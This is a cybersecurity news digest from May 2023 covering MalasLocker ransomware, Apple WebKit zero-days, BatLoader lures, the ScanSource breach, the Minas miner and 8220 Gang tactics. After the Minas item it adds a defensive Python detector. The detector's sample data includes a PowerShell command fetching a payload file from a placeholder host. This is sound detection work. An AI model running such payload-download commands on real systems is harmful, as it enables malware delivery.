New ransomware MalasLocker demands that victims donate to charity

Published 2023-05-19

1. New ransomware MalasLocker demands that victims donate to charity


According to media reports on May 17, the new MalasLocker ransomware compromises Zimbra servers to steal email and encrypt files. Instead of demanding a ransom, the attackers ask victims to donate to a designated non-profit charity. The campaign began at the end of March. When encrypting email, it does not append a special extension to file names, but it appends to the end of each encrypted file a note reading "This file is encrypted, check README.txt for decryption instructions". It is not yet clear how the attackers break into the Zimbra servers. MalasLocker's leak site currently lists data from three companies and the Zimbra configurations of 169 other victims.


https://www.bleepingcomputer.com/news/security/malaslocker-ransomware-targets-zimbra-servers-demands-charity-donation/


2. Apple fixes three actively exploited vulnerabilities in iPhone, Mac and iPad


On May 18, Apple released security updates fixing three actively exploited vulnerabilities in iPhone, Mac and iPad. All three were found in the cross-platform WebKit browser engine: a sandbox escape that can be used to break out of the Web Content sandbox (CVE-2023-32409), an out-of-bounds read that can expose sensitive information (CVE-2023-28204), and a use-after-free that can lead to arbitrary code execution (CVE-2023-32373). Apple addressed the issues with improved bounds checks, input validation and memory management, and has not disclosed details of the attacks. Since the start of the year, Apple has fixed six zero-day vulnerabilities.


https://securityaffairs.com/146411/security/apple-3-new-zero-day-bugs.html


3. BatLoader impersonates ChatGPT and Midjourney in recent attacks


On May 16, eSentire reported that it had discovered BatLoader campaigns impersonating ChatGPT and Midjourney. The researchers note that both AI services are very popular but have no official standalone application: users can only interact with ChatGPT and Midjourney through the web interface and Discord. The attackers exploit this gap by directing users who search for AI applications to counterfeit web pages. In the campaign impersonating ChatGPT, BatLoader infects devices through an MSIX Windows App Installer file and Redline Stealer. In the campaign impersonating Midjourney, a Windows application package signed by Ashana Global Ltd. is downloaded.


https://www.esentire.com/blog/batloader-impersonates-midjourney-chatgpt-in-drive-by-cyberattacks


4. Technology provider ScanSource hit by ransomware attack, website temporarily inaccessible


According to reports on May 17, technology provider ScanSource disclosed that it had suffered a ransomware attack affecting some of its systems, business operations and customer portals. Starting on May 15, ScanSource customers reported that they could not access the company's website. The company subsequently confirmed that it had been hit by ransomware on May 14. The impact is significant: the company says that services provided to customers will be delayed for some time, and it expects the business in North America and Brazil to be affected. In addition, its share price fell 1.42% on May 17, which may be a consequence of the attack.


https://www.bleepingcomputer.com/news/security/scansource-says-ransomware-attack-behind-multi-day-outages/


5. Kaspersky discloses technical details of the Minas malicious miner campaign


On May 17, Kaspersky disclosed technical details of the Minas malicious cryptominer campaign. The researchers reconstructed its infection chain starting from the PowerShell execution: a PowerShell script is run via Task Scheduler and downloads the file lgntoerr.gif from a remote server, which is decrypted into a .NET DLL; that DLL extracts and decrypts three files from its resources, and finally the miner DLL is extracted and launched in memory. The researchers say Minas is a miner with a standard implementation that aims to hide its presence. It is not yet possible to determine with certainty how the initial PowerShell command was executed, but various indications point to execution via GPO.


https://securelist.com/minas-miner-on-the-way-to-complexity/109692/
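As an added illustration (not code from Kaspersky's report), the following Python heuristic shows how a defender could flag the first step of the Minas chain described above in process-creation telemetry: PowerShell spawned under the Task Scheduler service that fetches a file with an image extension from a remote host. The event shape, field names and sample events are constructed assumptions, not a real capture.

```python
import re

# Constructed sample process-creation events in a simplified, Sysmon-like
# shape (assumption: illustrative only, not a capture from the Minas campaign).
SAMPLE_EVENTS = [
    # The Task Scheduler service runs inside this svchost instance.
    {"pid": 4120, "ppid": 1188, "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs -p -s Schedule"},
    # Scheduled PowerShell pulling an "image" file from a remote host.
    {"pid": 5016, "ppid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -c \"Invoke-WebRequest "
                "http://cdn.example.invalid/lgntoerr.gif -OutFile C:\\ProgramData\\lgntoerr.gif\""},
    # Benign scheduled script: no remote image fetch, must not alert.
    {"pid": 6100, "ppid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\backup.ps1"},
    # Image fetch by PowerShell whose parent is not the scheduler: not alerted.
    {"pid": 6200, "ppid": 3300,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -c \"Invoke-WebRequest "
                "https://intranet.example.invalid/logo.gif -OutFile logo.gif\""},
]

# A URL whose path ends in an image extension, as with lgntoerr.gif.
IMAGE_URL = re.compile(r"https?://\S+?\.(?:gif|png|jpe?g|bmp)\b", re.IGNORECASE)

def is_powershell(event):
    return event["image"].lower().endswith(("\\powershell.exe", "\\pwsh.exe"))

def spawned_by_task_scheduler(event, by_pid):
    """True when the direct parent is the svchost hosting the Schedule service."""
    parent = by_pid.get(event["ppid"])
    if parent is None:
        return False
    return (parent["image"].lower().endswith("\\svchost.exe")
            and "-s schedule" in parent["cmdline"].lower())

def find_suspicious_chains(events):
    """Return (pid, url) for scheduled PowerShell that fetches an image-named file."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if not is_powershell(e):
            continue
        urls = IMAGE_URL.findall(e["cmdline"])
        if urls and spawned_by_task_scheduler(e, by_pid):
            hits.append((e["pid"], urls[0]))
    return hits
```

A real deployment would pair this parent-process check with the later stages Kaspersky describes (in-memory .NET assembly loading and the miner DLL), since an image-named download alone is a weak signal.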


6. Trend Micro publishes analysis report on the 8220 Gang's new tactics


On May 16, Trend Micro published an analysis report on the 8220 Gang's new tactics. The group has been very active in recent months, exploiting a vulnerability in Oracle WebLogic Server (CVE-2017-3506) to deliver PowerShell, which then creates another obfuscated PowerShell script in memory. This new script disables Windows AMSI detection and launches a Windows binary, which subsequently connects to a remote server to retrieve the payload. The attack also uses a legitimate Linux tool, lwp-download, to save arbitrary files on the target host.


https://www.trendmicro.com/en_us/research/23/e/8220-gang-evolution-new-strategies-adapted.html